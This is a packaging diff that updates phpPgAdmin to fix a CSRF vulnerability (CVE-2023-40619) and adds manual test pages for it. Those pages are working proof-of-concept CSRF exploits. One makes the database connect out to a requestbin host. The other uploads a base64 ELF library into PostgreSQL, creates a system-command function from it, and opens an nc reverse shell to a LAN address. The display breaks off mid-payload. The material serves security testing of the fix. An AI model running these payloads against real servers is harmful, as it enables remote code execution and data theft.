034c444daf
Update to 7.14.6, Fix for CVE-2023-40619, boo#1215551 OBS-URL: https://build.opensuse.org/request/show/1123213 OBS-URL: https://build.opensuse.org/package/show/server:php:applications/phpPgAdmin?expand=0&rev=36
242 lines
20 KiB
Diff
242 lines
20 KiB
Diff
Index: classes/Misc.php
|
|
===================================================================
|
|
--- classes/Misc.php.orig
|
|
+++ classes/Misc.php
|
|
@@ -1354,6 +1354,10 @@
|
|
echo '<div class="alert-banner"><p><a href="https://www.php.net/manual/en/session.configuration.php#ini.session.cookie-samesite" target="_blank" rel="noopener noreferrer">', htmlspecialchars($lang['sessionsecuritywarning']), '</a></p></div>';
|
|
}
|
|
|
|
+ if (!$conf['extra_session_security']) {
|
|
+ echo '<div class="alert-banner"><p><a href="http://phppgadmin.sourceforge.net/doku.php?id=faq#other_questions" target="_blank" rel="noopener noreferrer">', htmlspecialchars($lang['sessionsecuritywarning']), '</a></p></div>';
|
|
+ }
|
|
+
|
|
echo "<div class=\"topbar\"><table style=\"width: 100%\"><tr><td>";
|
|
|
|
if ($server_info && isset($server_info['platform']) && isset($server_info['username'])) {
|
|
Index: conf/config.inc.php-dist
|
|
===================================================================
|
|
--- conf/config.inc.php-dist.orig
|
|
+++ conf/config.inc.php-dist
|
|
@@ -98,6 +98,15 @@
|
|
// to this feature and will be vulnerable to CSRF attacks.
|
|
$conf['extra_session_security'] = true;
|
|
|
|
+ // If extra session security is true, then PHP's session cookies will have
|
|
+ // SameSite cookie flags set to prevent CSRF attacks. If you're using
|
|
+ // auto-start sessions, autostarted sessions will be destroyed and
|
|
+ // restarted with SameSite on. If this this solution is not acceptable for
|
|
+ // your situation, you will need to either turn off auot-start sessions, or
|
|
+ // turn off secure sessions. Versions of PHP below 7.3 do not have access
|
|
+ // to this feature and will be vulnerable to CSRF attacks.
|
|
+ $conf['extra_session_security'] = true;
|
|
+
|
|
// AutoComplete uses AJAX interaction to list foreign key values
|
|
// on insert fields. It currently only works on single column
|
|
// foreign keys. You can choose one of the following values:
|
|
Index: tests/manual/issue-94/README.md
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/README.md
|
|
@@ -0,0 +1,42 @@
|
|
+# Testing CSRF vulnerabilities (Issue #94)
|
|
+
|
|
+How to test:
|
|
+
|
|
+1. Start phppgadmin:
|
|
+
|
|
+```
|
|
+$ cd /path/to/phppgadmin
|
|
+$ php -S localhost:8000
|
|
+```
|
|
+
|
|
+2. Set up a testing domain in /etc/hosts:
|
|
+
|
|
+```
|
|
+127.0.0.1 localhost2
|
|
+```
|
|
+
|
|
+3. Start the tests
|
|
+
|
|
+```
|
|
+$ cd /path/to/phppgadmin/tests/manual/issue-94
|
|
+$ php -S localhost2:8001
|
|
+```
|
|
+
|
|
+4. Open both sites in the same browser (different windows or tabs):
|
|
+
|
|
+```
|
|
+http://localhost:8000
|
|
+```
|
|
+
|
|
+```
|
|
+http://localhost2:8001
|
|
+```
|
|
+
|
|
+5. Log in to phppgadmin
|
|
+
|
|
+6. Run a test
|
|
+
|
|
+Choose a test from the list. Open your console, and click "Submit Request" -- you should see a CORS error, but the request should also appear in the network tab. Open it to see the response.
|
|
+
|
|
+If you see a login page, phppgadmin is protected. If not, phppgadmin is vulnerable.
|
|
+
|
|
Index: tests/manual/issue-94/index.html
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/index.html
|
|
@@ -0,0 +1,12 @@
|
|
+<html>
|
|
+<head>
|
|
+<title>Issue #94 (CSRF vulnerabilities) proof of concepts</title>
|
|
+</head>
|
|
+<body>
|
|
+<h1>Issue #94: CSRF vulnerabilities</h1>
|
|
+<ul>
|
|
+<li><a href="poc1.html">Proof of concept #1: out of band technique</a></li>
|
|
+<li><a href="poc2.html">Proof of concept #2: remote code execution</a></li>
|
|
+<ul>
|
|
+</body>
|
|
+</html>
|
|
Index: tests/manual/issue-94/poc1.html
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/poc1.html
|
|
@@ -0,0 +1,48 @@
|
|
+<html>
|
|
+<body>
|
|
+<script>
|
|
+function submitRequest() {
|
|
+ var xhr = new XMLHttpRequest();
|
|
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
|
|
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
|
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
|
|
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------317222262731323");
|
|
+ xhr.withCredentials = true;
|
|
+ var body = "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "CREATE EXTENSION dblink;\r\n" +
|
|
+ "SELECT dblink_connect(\'host=mydatahere.b940ab686a17804777c0.d.requestbin.net user=postgres password=password dbname=dvdrental\');\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "2097152\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
|
|
+ "Content-Type: application/octet-stream\r\n" +
|
|
+ "\r\n" +
|
|
+ "\r\n" + "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "Execute\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "localhost:5432:allow\r\n" +
|
|
+ "-----------------------------317222262731323\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "postgres\r\n" +
|
|
+ "-----------------------------317222262731323--\r\n";
|
|
+ var aBody = new Uint8Array(body.length);
|
|
+ for (var i = 0; i < aBody.length; i++) {
|
|
+ aBody[i] = body.charCodeAt(i);
|
|
+ }
|
|
+ xhr.send(new Blob([aBody]));
|
|
+}
|
|
+</script>
|
|
+<form action="#">
|
|
+ <input type="button" value="Submit request" onclick="submitRequest();" />
|
|
+</form>
|
|
+</body>
|
|
+</html>
|
|
Index: tests/manual/issue-94/poc2.html
|
|
===================================================================
|
|
--- /dev/null
|
|
+++ tests/manual/issue-94/poc2.html
|
|
@@ -0,0 +1,53 @@
|
|
+<html>
|
|
+<body>
|
|
+<script>history.pushState('', '', '/')</script> <script>
|
|
+ function submitRequest() {
|
|
+ var xhr = new XMLHttpRequest();
|
|
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
|
|
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
|
|
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
|
|
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------297112967428312");
|
|
+ xhr.withCredentials = true;
|
|
+ var body = "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "SELECT lo_create(43213);\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 0, decode(\'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkAUAAAAAAABAAAAAAAAAAHAYAAAAAAAAAAAAAEAAOAAHAEAAHAAbAA EAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AcAAAAAAADUBwAAAAAAAAAAIAAAAAAAAQAAAAYAAAAQDgAAAAAAA BAOIAAAAAAAEA4gAAAAAAAYAgAAAAAAACACAAAAAAAAAAAgAAAAAAACAAAABgAAACAOAAAAAAAAIA4gAAAAAAAgDiAAAAAA AMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAA AAAQAAAAAAAAAUOV0ZAQAAADgBgAAAAAAAOAGAAAAAAAA4AYAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBg AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAAEA4AAAAAAAAQDiAAA AAAABAOIAAAAAAA8AEAAAAAAADwAQAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAFog8ajfjzeRZSUvwvUgWu2xriUA AAAAAAMAAAAGAAAAAQAAAAYAAACMwCABAQbACQYAAAAJAAAADAAAAEJF1ey645J8R9pqNKAQbqjYcVgcuY3xDsYNptTr0+8 OAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAA AAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAFIAAAAiAAAAAAAAAAAAAAAAA AAAAAAAAJEAAAAQABYAKBAgAAAAAAAAAAAAAAAAAKQAAAAQABcAMBAgAAAAAAAAAAAAAAAAAG8AAAASAAwAdwYAAAAAAAAN AAAAAAAAAHgAAAASAAwAhAYAAAAAAAAqAAAAAAAAAJgAAAAQABcAKBAgAAAAAAAAAAAAAAAAABAAAAASAAkAQAUAAAAAAAA AAAAAAAAAAGEAAAASAAwAagYAAAAAAAANAAAAAAAAABYAAAASAA0AsAYAAAAAAAAAAAAAAAAAAABfX2dtb25fc3RhcnRfXw BfaW5pdABfZmluaQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4Y V9maW5hbGl6ZQBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3BnX2V4ZWMAc3lzdGVtAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nf c3RhcnQAX2VuZABHTElCQ18yLjIuNQAAAAAAAAIAAAAAAAIAAQABAAEAAQABAAEAAQABAAAAAAAAAAEAAQCHAAAAEAAAAAA AAAB1GmkJAAACAKkAAAAAAAAAEA4gAAAAAAAIAAAAAAAAAGAGAAAAAAAAGA4gAAAAAAAIAAAAAAAAACAGAAAAAAAAIBAgAA AAAAAIAAAAAAAAACAQIAAAAAAA4A8gAAAAAAAGAAAAAQAAAAAAAAAAAAAA6A8gAAAAAAAGAAAAAwAAAAAAAAAAAAAA8A8gA AAAAAAGAAAABAAAAAAAAAAAAAAA+A8gAAAAAAAGAAAABQAAAAAAAAAAAAAAGBAgAAAAAAAHAAAAAgAAAAAAAAAAAAAASIPs CEiLBZ0KIABIhcB0Av/QSIPECMMAAAAAAAAAAAD/NaIKIAD/JaQKIAAPH0AA/yWiCiAAaAAAAADp4P////8lcgogAGaQAAA AAAAAAABIjT2RCiAAVUiNBYkKIABIOfhIieV0GUiLBTIKIABIhcB0DV3/4GYuDx+EAAAAAABdww8fQABmLg8fhAAAAAAASI 09UQogAEiNNUoKIABVSCn+SInlSMH+A0iJ8EjB6D9IAcZI0f50GEiLBfEJIABIhcB0DF3/4GYPH4QAAAAAAF3DDx9AAGYuD x+EAAAAAACAPQEKIAAAdS9Igz3HCSAAAFVIieV0DEiLPeIJIADoPf///+hI////xgXZCSAAAV3DDx+AAAAAAPPDZg8fRAAA VUiJ5V3pZv///1VIieVIjQVLAAAAXcNVSInlSI0FWgAAAF3DVUiJ5UiD7CBIiX3oSItF6EiLQCBIiUX4SItF+EiJx+jI/v/ /SJiJwMnDAABIg+wISIPECMMAAAAAAAAAHAAAAOgDAABkAAAAIAAAAEAAAAABAAAAAQAAAAEAAAABGwM7NAAAAAUAAACA/v //UAAAAKD+//94AAAAiv///5AAAACX////sAAAAKT////QAAAAAAAAABQAAAAAAAAAAXpSAAF4EAEbDAcIkAEAACQAAAAcA AAAKP7//yAAAAAADhBGDhhKDwt3CIAAPxo7KjMkIgAAAAAUAAAARAAAACD+//8IAAAAAAAAAAAAAAAcAAAAXAAAAPL+//8N AAAAAEEOEIYCQw0GSAwHCAAAABwAAAB8AAAA3/7//w0AAAAAQQ4QhgJDDQZIDAcIAAAAHAAAAJwAAADM/v//KgAAAABBDhC GAkMNBmUMBwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 1, decode(\'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAGAAAAAAAAI AYAAAAAAAABAAAAAAAAAIcAAAAAAAAADAAAAAAAAABABQAAAAAAAA0AAAAAAAAAsAYAAAAAAAAZAAAAAAAAABAOIAAAAAAA GwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAGA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAA AiAMAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAAC1AAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAA AAAgAAAAAAAAAYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAACgFAAAAAAAABwAAAAAAAACABAAAAAAAAAgAAAAAA AAAqAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABgBAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAD4EAAAA AAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 2, decode(\'IA4gAAAAAAAAAAAAAAAAAAAAAAAAAAAAdgUAAAAAAAAgECAAAAAAAEdDQzogKFVidW50dSA3LjMuMC0xNnVidW 50dTMpIDcuMy4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABAMgBAAAAAAAAAAAAAAAAAAAAAAAAAwACA PABAAAAAAAAAAAAAAAAAAAAAAAAAwADADgCAAAAAAAAAAAAAAAAAAAAAAAAAwAEAIgDAAAAAAAAAAAAAAAAAAAAAAAAAwAF AD4EAAAAAAAAAAAAAAAAAAAAAAAAAwAGAGAEAAAAAAAAAAAAAAAAAAAAAAAAAwAHAIAEAAAAAAAAAAAAAAAAAAAAAAAAAwA IACgFAAAAAAAAAAAAAAAAAAAAAAAAAwAJAEAFAAAAAAAAAAAAAAAAAAAAAAAAAwAKAGAFAAAAAAAAAAAAAAAAAAAAAAAAAw ALAIAFAAAAAAAAAAAAAAAAAAAAAAAAAwAMAJAFAAAAAAAAAAAAAAAAAAAAAAAAAwANALAGAAAAAAAAAAAAAAAAAAAAAAAAA wAOAMAGAAAAAAAAAAAAAAAAAAAAAAAAAwAPAOAGAAAAAAAAAAAAAAAAAAAAAAAAAwAQABgHAAAAAAAAAAAAAAAAAAAAAAAA AwARABAOIAAAAAAAAAAAAAAAAAAAAAAAAwASABgOIAAAAAAAAAAAAAAAAAAAAAAAAwATACAOIAAAAAAAAAAAAAAAAAAAAAA AAwAUAOAPIAAAAAAAAAAAAAAAAAAAAAAAAwAVAAAQIAAAAAAAAAAAAAAAAAAAAAAAAwAWACAQIAAAAAAAAAAAAAAAAAAAAA AAAwAXACgQIAAAAAAAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMA AAAAgAMAJAFAAAAAAAAAAAAAAAAAAAOAAAAAgAMANAFAAAAAAAAAAAAAAAAAAAhAAAAAgAMACAGAAAAAAAAAAAAAAAAAAA3 AAAAAQAXACgQIAAAAAAAAQAAAAAAAABGAAAAAQASABgOIAAAAAAAAAAAAAAAAABtAAAAAgAMAGAGAAAAAAAAAAAAAAAAAAB 5AAAAAQARABAOIAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAACiAAAAAQAOAMAGAAAAAAAAHAAAAAAAAA C1AAAAAQAOANwGAAAAAAAABAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAADDAAAAAQAQANAHAAAAAAAAAAAAAAAAA AAAAAAABADx/wAAAAAAAAAAAAAAAAAAAADRAAAAAQAWACAQIAAAAAAAAAAAAAAAAADeAAAAAQATACAOIAAAAAAAAAAAAAAA AADnAAAAAAAPAOAGAAAAAAAAAAAAAAAAAAD6AAAAAQAWACgQIAAAAAAAAAAAAAAAAAAGAQAAAQAVAAAQIAAAAAAAAAAAAAA AAAAcAQAAEgAMAGoGAAAAAAAADQAAAAAAAAAqAQAAIAAAAAAAAAAAAAAAAAAAAAAAAABGAQAAEAAWACgQIAAAAAAAAAAAAA AAAABNAQAAEgANALAGAAAAAAAAAAAAAAAAAABTAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABnAQAAIAAAAAAAAAAAAAAAAAAAA AAAAACQAQAAEgAMAIQGAAAAAAAAKgAAAAAAAAB2AQAAEAAXADAQIAAAAAAAAAAAAAAAAAB7AQAAEAAXACgQIAAAAAAAAAAA AAAAAACHAQAAEgAMAHcGAAAAAAAADQAAAAAAAACYAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACyAQAAIgAAAAAAAAAAAAAAAAA AAAAAAADOAQAAEgAJAEAFAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2 JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTYAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhb WVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AHBnX2V4ZWMuYwBQZ19tYWdpY19kYXRhLjQ3NzkAbXlf ZmluZm8uNDc4OABfX0ZSQU1FX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUN fRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAFBnX21hZ2ljX2Z1bmMAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF 9lZGF0YQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAF9lbmQAX19ic3Nfc3RhcnQAcGdfZmluZ m9fcGdfZXhlYwBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdAAA LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgA uZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0Lmc=\', \'base64\'));\r\n" +
|
|
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 3, decode(\'b3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV 9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABwAAAAIAAAAAAAAAyAEAAAAAAADIAQAAAAAA ACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAALgAAAPb//28CAAAAAAAAAPABAAAAAAAA8AEAAAAAAABEAAAAAAA AAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAADgAAAALAAAAAgAAAAAAAAA4AgAAAAAAADgCAAAAAAAAUAEAAAAAAAAEAAAAAQ AAAAgAAAAAAAAAGAAAAAAAAABAAAAAAwAAAAIAAAAAAAAAiAMAAAAAAACIAwAAAAAAALUAAAAAAAAAAAAAAAAAAAABAAAAA AAAAAAAAAAAAAAASAAAAP///28CAAAAAAAAAD4EAAAAAAAAPgQAAAAAAAAcAAAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAA AAAAAFUAAAD+//9vAgAAAAAAAABgBAAAAAAAAGAEAAAAAAAAIAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABkAAA ABAAAAAIAAAAAAAAAgAQAAAAAAACABAAAAAAAAKgAAAAAAAAAAwAAAAAAAAAIAAAAAAAAABgAAAAAAAAAbgAAAAQAAABCAA AAAAAAACgFAAAAAAAAKAUAAAAAAAAYAAAAAAAAAAMAAAAVAAAACAAAAAAAAAAYAAAAAAAAAHgAAAABAAAABgAAAAAAAABAB QAAAAAAAEAFAAAAAAAAFwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABzAAAAAQAAAAYAAAAAAAAAYAUAAAAAAABg BQAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAfgAAAAEAAAAGAAAAAAAAAIAFAAAAAAAAgAUAAAAAAAA IAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAIcAAAABAAAABgAAAAAAAACQBQAAAAAAAJAFAAAAAAAAHgEAAAAAAA AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACNAAAAAQAAAAYAAAAAAAAAsAYAAAAAAACwBgAAAAAAAAkAAAAAAAAAAAAAAAAAA AAEAAAAAAAAAAAAAAAAAAAAkwAAAAEAAAACAAAAAAAAAMAGAAAAAAAAwAYAAAAAAAAgAAAAAAAAAAAAAAAAAAAAEAAAAAAA AAAAAAAAAAAAAJsAAAABAAAAAgAAAAAAAADgBgAAAAAAAOAGAAAAAAAANAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAA AAACpAAAAAQAAAAIAAAAAAAAAGAcAAAAAAAAYBwAAAAAAALwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAswAAAA 4AAAADAAAAAAAAABAOIAAAAAAAEA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL8AAAAPAAAAAwAAA AAAAAAYDiAAAAAAABgOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADLAAAABgAAAAMAAAAAAAAAIA4g AAAAAAAgDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAAOAPIAAAAAAA4A8 AAAAAAAAgAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANQAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAIA AAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADdAAAAAQAAAAMAAAAAAAAAIBAgAAAAAAAgEAAAAAAAAAgAAAAAAAAAA AAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA4wAAAAgAAAADAAAAAAAAACgQIAAAAAAAKBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA AQAAAAAAAAAAAAAAAAAAAOgAAAABAAAAMAAAAAAAAAAAAAAAAAAAACgQAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA AAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAABQEAAAAAAAAFgFAAAAAAAAGgAAACwAAAAIAAAAAAAAABgAAAAAAA AACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAqBUAAAAAAADUAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADA AAAAAAAAAAAAAAAAAAAAAAAAHwXAAAAAAAA8QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
|
|
+ "SELECT lo_export(43213, \'/tmp/pg_exec.so\');\r\n" +
|
|
+ "CREATE FUNCTION sys(cstring) RETURNS int AS \'/tmp/pg_exec.so\', \'pg_exec\' LANGUAGE \'c\' STRICT;\r\n" +
|
|
+ "SELECT sys(\'mknod /tmp/backpipe p\');\r\n" +
|
|
+ "SELECT sys(\'/bin/sh 0\x3c/tmp/backpipe | nc 192.168.1.81 80 1\x3e/tmp/backpipe\');\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "2097152\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
|
|
+ "Content-Type: application/octet-stream\r\n" +
|
|
+ "\r\n" +
|
|
+ "\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "Execute\r\n" +
|
|
+ "-----------------------------297112967428312\r\n" +
|
|
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
|
|
+ "\r\n" +
|
|
+ "localhost:5432:allow\r\n" +
|
|
